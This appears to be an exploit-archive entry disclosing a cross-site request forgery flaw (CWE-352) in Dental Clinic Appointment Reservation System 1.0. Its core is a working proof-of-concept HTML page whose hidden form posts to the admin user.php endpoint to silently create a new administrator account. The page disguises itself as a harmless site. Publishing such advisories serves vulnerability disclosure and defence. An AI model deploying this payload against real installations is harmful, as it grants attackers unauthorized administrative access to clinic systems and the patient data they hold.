Dental Clinic Appointment Reservation System 1.0 Cross Site Request Forgery (Add Admin)

2021.05.19

Credit: Reza Afsahi

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 15-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.11 , Linux x64_x86
# --- Proof of concept --- #
# Vulnerable file : http://localhost/APR/admin/user.php
# Exploit:
<html>
<head>
<title>Add Admin</title>
</head>
<body>
<h1> Absolutely Not Vulnerable Site :D </h1>
<form method="POST" action="http://127.0.0.1/APR/admin/user.php">
<input type="hidden" name="username" value="lol">
<input type="hidden" name="password" value="321" >
<button type="submit" name="submit">Click</button>
</form>
</body>
</html>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Dental Clinic Appointment Reservation System 1.0 Cross Site Request Forgery (Add Admin)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.